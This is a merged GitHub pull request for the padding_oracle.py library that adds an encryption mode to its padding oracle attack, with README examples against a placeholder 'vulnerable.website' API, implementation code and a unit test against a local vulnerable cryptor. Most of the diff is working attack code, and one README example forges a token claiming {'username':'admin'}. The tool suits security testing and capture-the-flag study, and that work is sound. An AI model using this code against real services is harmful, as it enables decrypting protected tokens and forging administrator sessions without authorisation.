Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add encryption support #4

Merged
merged 7 commits into from
Nov 17, 2023
Merged
Show file tree
Hide file tree
Changes from 5 commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
39 changes: 38 additions & 1 deletion README.md
Original file line number Diff line number Diff line change
@@ -1,3 +1,4 @@

q3st1on marked this conversation as resolved.
Show resolved Hide resolved
# Padding Oracle Python Automation Script

![python-package-badge](https://github.com/djosix/padding_oracle.py/actions/workflows/python-package.yml/badge.svg)
Expand Down Expand Up @@ -30,7 +31,7 @@ Performance of padding_oracle.py was evaluated using [0x09] Cathub Party from ED
| 64 | 56s |

## How to Use

### Decryption
q3st1on marked this conversation as resolved.
Show resolved Hide resolved
To illustrate the usage, consider an example of testing `https://vulnerable.website/api/?token=M9I2K9mZxzRUvyMkFRebeQzrCaMta83eAE72lMxzg94%3D`:

```python
Expand Down Expand Up @@ -63,6 +64,42 @@ plaintext = padding_oracle(
num_threads = 16,
)
```
### Encryption
Copy link
Owner

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Nit: Needs an extra line above and below.

To illustrate the usage, consider an example of forging a token for`https://vulnerable.website/api/?token=<.....>`:
q3st1on marked this conversation as resolved.
Show resolved Hide resolved

```python
from padding_oracle import padding_oracle, base64_encode, base64_decode
import requests

sess = requests.Session() # use connection pool
url = 'https://vulnerable.website/api/'

def oracle(ciphertext: bytes):
resp = sess.get(url, params={'token': base64_encode(ciphertext)})

if 'failed' in resp.text:
return False # e.g. token decryption failed
elif 'success' in resp.text:
return True
else:
raise RuntimeError('unexpected behavior')

def pad(data: bytes, block_size=16):
pad_value = block_size - len(data) % block_size
return data + bytearray([pad_value for i in range(pad_value)])

payload: bytes =b"{'username':'admin'}"
payload = pad(payload)
assert len(payload) % 16 == 0

ciphertext = padding_oracle(
payload,
block_size = 16,
oracle = oracle,
num_threads = 16,
mode = 'encrypt'
)
```

In addition, the package provides PHP-like encoding/decoding functions:

Expand Down
75 changes: 64 additions & 11 deletions src/padding_oracle/legacy.py
Original file line number Diff line number Diff line change
Expand Up @@ -33,21 +33,21 @@
'padding_oracle',
]


q3st1on marked this conversation as resolved.
Show resolved Hide resolved
def padding_oracle(ciphertext: Union[bytes, str],
def padding_oracle(payload: Union[bytes, str],
block_size: int,
oracle: OracleFunc,
num_threads: int = 1,
log_level: int = logging.INFO,
null_byte: bytes = b' ',
return_raw: bool = False,
mode: Union[bool, str] = 'decrypt',
) -> Union[bytes, List[int]]:
'''
Run padding oracle attack to decrypt ciphertext given a function to check
wether the ciphertext can be decrypted successfully.

Args:
ciphertext (bytes|str) the ciphertext you want to decrypt
payload (bytes|str) the payload you want to encrypt/decrypt
block_size (int) block size (the ciphertext length should be
multiple of this)
oracle (function) a function: oracle(ciphertext: bytes) -> bool
Expand All @@ -58,33 +58,48 @@ def padding_oracle(ciphertext: Union[bytes, str],
set (default: None)
return_raw (bool) do not convert plaintext into bytes and
unpad (default: False)
mode (bool|str) encrypt the payload (defaut: False/'decrypt')
q3st1on marked this conversation as resolved.
Show resolved Hide resolved


Returns:
plaintext (bytes|List[int]) the decrypted plaintext
result (bytes|List[int]) the processed payload
'''

# Check args
if not callable(oracle):
raise TypeError('the oracle function should be callable')
if not isinstance(ciphertext, (bytes, str)):
raise TypeError('ciphertext should have type bytes')
if not isinstance(payload, (bytes, str)):
raise TypeError('payload should have type bytes')
if not isinstance(block_size, int):
raise TypeError('block_size should have type int')
if not len(ciphertext) % block_size == 0:
raise ValueError('ciphertext length should be multiple of block size')
if not len(payload) % block_size == 0:
raise ValueError('payload length should be multiple of block size')
if not 1 <= num_threads <= 1000:
raise ValueError('num_threads should be in [1, 1000]')
if not isinstance(null_byte, (bytes, str)):
raise TypeError('expect null with type bytes or str')
if not len(null_byte) == 1:
raise ValueError('null byte should have length of 1')
if not isinstance(mode, (bool, str)):
q3st1on marked this conversation as resolved.
Show resolved Hide resolved
raise TypeError('expect mode with type bool or str')
if isinstance(mode, str) and mode not in ('encrypt', 'decrypt'):
raise ValueError('mode must be either encrypt or decrypt')

logger = get_logger()
logger.setLevel(log_level)

ciphertext = to_bytes(ciphertext)
payload = to_bytes(payload)
null_byte = to_bytes(null_byte)


# Does the user want the encryption routine
if (mode == 'encrypt') or (mode == True):
q3st1on marked this conversation as resolved.
Show resolved Hide resolved
return encrypt(payload, block_size, oracle, num_threads, null_byte, logger)

# If not continue with decryption as normal
return decrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger)

def decrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger):
# Wrapper to handle exceptions from the oracle function
def wrapped_oracle(ciphertext: bytes):
try:
Expand All @@ -105,16 +120,54 @@ def plaintext_callback(plaintext: bytes):
plaintext = convert_to_bytes(plaintext, null_byte)
logger.info(f'plaintext: {plaintext}')

plaintext = solve(ciphertext, block_size, wrapped_oracle, num_threads,
plaintext = solve(payload, block_size, wrapped_oracle, num_threads,
result_callback, plaintext_callback)

if not return_raw:
plaintext = convert_to_bytes(plaintext, null_byte)
plaintext = remove_padding(plaintext)

q3st1on marked this conversation as resolved.
Show resolved Hide resolved
return plaintext


def encrypt(payload, block_size, oracle, num_threads, null_byte, logger):
# Wrapper to handle exceptions from the oracle function
def wrapped_oracle(ciphertext: bytes):
try:
return oracle(ciphertext)
except Exception as e:
logger.error(f'error in oracle with {ciphertext!r}, {e}')
logger.debug('error details: {}'.format(traceback.format_exc()))
return False

def result_callback(result: ResultType):
if isinstance(result, Fail):
if result.is_critical:
logger.critical(result.message)
else:
logger.error(result.message)

def plaintext_callback(plaintext: bytes):
q3st1on marked this conversation as resolved.
Show resolved Hide resolved
plaintext = convert_to_bytes(plaintext, null_byte)
logger.info(f'plaintext: {plaintext}')

def blocks(data: bytes):
return [data[index:(index+block_size)] for index in range(0, len(data), block_size)]

def bytes_xor(byte_string_1: bytes, byte_string_2: bytes):
return bytes([_a ^ _b for _a, _b in zip(byte_string_1, byte_string_2)])

plaintext_blocks = blocks(payload)
ciphertext_blocks = [null_byte * block_size for _ in range(len(plaintext_blocks)+1)]

for index in range(len(plaintext_blocks)-1, -1, -1):
plaintext = solve(b'\x00' * block_size + ciphertext_blocks[index+1], block_size, wrapped_oracle,
num_threads, result_callback, plaintext_callback)
ciphertext_blocks[index] = bytes_xor(plaintext_blocks[index], plaintext)

ciphertext = b''.join(ciphertext_blocks)
return ciphertext

def get_logger():
logger = logging.getLogger('padding_oracle')
formatter = logging.Formatter('[%(asctime)s][%(levelname)s] %(message)s')
Expand Down
1 change: 0 additions & 1 deletion src/padding_oracle/solve.py
Original file line number Diff line number Diff line change
Expand Up @@ -38,7 +38,6 @@
'remove_padding',
]


class Pass(NamedTuple):
block_index: int
solved: List[int]
Expand Down
16 changes: 16 additions & 0 deletions tests/test_padding_oracle.py
Original file line number Diff line number Diff line change
@@ -1,3 +1,4 @@
from cryptography.hazmat.primitives import padding
from padding_oracle import padding_oracle
from .cryptor import VulnerableCryptor

Expand All @@ -14,6 +15,21 @@ def test_padding_oracle_basic():

assert decrypted == plaintext

def test_padding_oracle_encryption():
cryptor = VulnerableCryptor()

plaintext = b'the quick brown fox jumps over the lazy dog'
ciphertext = cryptor.encrypt(plaintext)

padder = padding.PKCS7(128).padder()
q3st1on marked this conversation as resolved.
Show resolved Hide resolved
payload = padder.update(plaintext) + padder.finalize()

encrypted = padding_oracle(payload, cryptor.block_size,
cryptor.oracle, 4, null_byte=b'?', mode='encrypt')
decrypted = cryptor.decrypt(encrypted)

assert decrypted == plaintext
Copy link
Owner

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

It will be better to write assert encrypted == ciphertext here 🤔


if __name__ == '__main__':
test_padding_oracle_basic()
test_padding_oracle_encryption()